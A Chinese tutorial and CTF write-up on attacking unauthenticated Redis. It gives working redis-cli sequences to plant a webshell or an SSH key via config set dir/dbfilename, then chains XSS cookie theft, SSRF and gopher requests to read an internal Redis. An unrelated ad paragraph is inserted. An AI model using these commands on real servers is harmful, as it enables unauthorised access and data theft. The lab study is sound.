redis未授权访问的方法

这篇文章主要为大家详细介绍了redis未授权访问的方法,图文详解容易学习,配合代码阅读理解效果更佳,非常适合初学者入门,感兴趣的小伙伴们可以参考一下。

站在用户的角度思考问题,与客户深入沟通,找到海林网站设计与海林网站推广的解决方案,凭借多年的经验,让设计与互联网技术结合,创造个性化、用户体验好的作品,建站类型包括:成都网站建设、做网站、企业官网、英文网站、手机端网站、网站推广、域名注册、虚拟空间、企业邮箱。业务覆盖海林地区。

redis是一种以key-value为键值对的非关系型数据库。

redis是一个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。

它通常被称为数据结构服务器,因为值(value)可以是 字符串(String), 哈希(Map), 列表(list), 集合(sets) 和 有序集合(sorted sets)等类型。

安装服务

win

下载地址:https://github.com/MSOpenTech/redis/releases
测试环境:

操作系统:win7
ip:192.168.107.144

redis未授权访问的方法

命令行输入

redis-server.exe redis.conf

redis未授权访问的方法

接着查看端口

redis未授权访问的方法

6379端口(redis默认端口)已经打开

redis成功启动

ubuntu

安装

sudo apt-get update
sudo apt-get install redis-server

启动服务

redis-server

基本命令

连接redis

redis-cli.exe -h 192.168.107.144

查看键为x的值

redis 192.168.107.144:6379> get x
""

get所有key

redis 192.168.107.144:6379> keys *
1) "x"

删除所有键

redis 192.168.107.144:6379>flushall

漏洞利用

本机通过telnet命令主动去连接目标机

redis未授权访问的方法

或者通过redis-cli.exe -h 192.168.107.144连接

redis未授权访问的方法

连接成功

输入info获取相关信息

可以看到redis版本号等

redis未授权访问的方法

利用方式

  • 写入一句话webshell

  • 写入ssh公钥

写入shell

redis未授权访问的方法

//设置x的值
redis 192.168.107.144:6379> set x ""  

redis 192.168.107.144:6379> config set dbfilename test.php

redis 192.168.107.144:6379> config set dir D:/WWW/PHPTutorial/WWW

redis 192.168.107.144:6379> save

成功写入目标机

redis未授权访问的方法

写入ssh公钥

在本地生成一对密钥

root@ip-172-31-14-115:~/.ssh# ssh-keygen -t rsa

redis未授权访问的方法

接着将ssh公钥写入靶机

root@ip-172-31-14-115:/etc/redis# redis-cli -h 192.168.107.144
192.168.107.144:6379> config set dir /root/.ssh                   # 设置本地存储文件目录
192.168.107.144:6379> config set dbfilename pub_keys        # 设置本地存储文件名

192.168.107.144:6379> set x "xxxx"  # 将你的ssh公钥写入x键里。(xxxx即你自己生成的ssh公钥)

192.168.107.144:6379> save     # 保存

再到本地去连接ssh

root@ip-172-31-14-115:~/.ssh# ssh -i id_rsa root@192.168.107.144

即可

CTF中的redis(XSS->SSRF&Gopher->Redis)

题目为

redis未授权访问的方法

题目地址:https://hackme.inndy.tw/scoreboard/

xeeme

泄露

redis未授权访问的方法

在robots.txt发现泄露源码

是加密了的config.php

redis未授权访问的方法

xss打cookie

注册登陆后的界面

redis未授权访问的方法

发邮件有验证

redis未授权访问的方法

验证写个脚本即可

".md5($captcha);
?>

然后过滤了一些东西

redis未授权访问的方法

用img测试

redis未授权访问的方法

onload也过滤了

redis未授权访问的方法

这里注意到一个细节,过滤的是空格加上onerror,猜想是匹配到有空格的onerror才会过滤,于是构造没有空格的onerror,尝试payload

然后打cookie,成功打到cookie

redis未授权访问的方法

将SESSION解码

PHPSESSID=rmibdo13ohquscgsuphitr9cp4; FLAG_XSSME=FLAG{Sometimes, XSS can be critical vulnerability }; FLAG_2=IN_THE_REDIS

xssrf leak

根据上一题的cookie,FLAG_2=IN_THE_REDIS

还是一样的环境

因为拿到了管理员的cookie,于是登陆一下

redis未授权访问的方法

需要本地登陆,尝试一下伪造xff头

换了几个ip头都没用

于是想到之前做的题,可以直接去打管理员页面的源码

这里 不知道为什么 xss平台接收不到,于是换了一个平台

利用payload

redis未授权访问的方法

发现innerhtml被过滤

于是html编码

发现收到请求

redis未授权访问的方法

解个码,放在本地

redis未授权访问的方法

SSRF读取config.php

猜测send request功能存在ssrf

vps收到请求

redis未授权访问的方法

解码:

...


      

post请求的url参数

尝试读文件

成功读到/etc/passwd

redis未授权访问的方法

于是读之前的config.php

redis未授权访问的方法

xssrf redis(ssrf+gopher拿下flag)

根据flag的提示,redis的端口是25566
请求redis配合gopher

redis未授权访问的方法

成功获取info

查看一下keys

xmlhttp.send("url=gopher://127.0.0.1:25566/_key%2520*");

redis未授权访问的方法

去读

既然有flag键,那么直接去读flag的值

xmlhttp.send("url=gopher://127.0.0.1:25566/_get%2520flag");

redis未授权访问的方法

类型不符合

于是查看类型

xmlhttp.send("url=gopher://127.0.0.1:25566/_type%2520flag");

redis未授权访问的方法

是list,返回列表长度

xmlhttp.send("url=gopher://127.0.0.1:25566/_LLEN%2520flag");

redis未授权访问的方法

那么获取所有元素

xmlhttp.send("url=gopher://127.0.0.1:25566/_LRANGE%2520flag%25200%252053");

redis未授权访问的方法

于是写个脚本

flag="""
}
t
i
o
l
p
x
e

o
t

y
s
a
e

s
i

n
o
i
t
a
c
i
t
n
e
h
t
u
a

t
u
o
h
t
i
w

s
i
d
e
R
{
G
A
L
F
"""
result = flag[::-1]
print(result)

最后flag FLAG{Redis without authentication is easy to exploit}

关于redis未授权访问的方法就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果喜欢这篇文章,不如把它分享出去让更多的人看到。


本文标题:redis未授权访问的方法
链接URL:http://hbruida.cn/article/pcodgg.html

其他资讯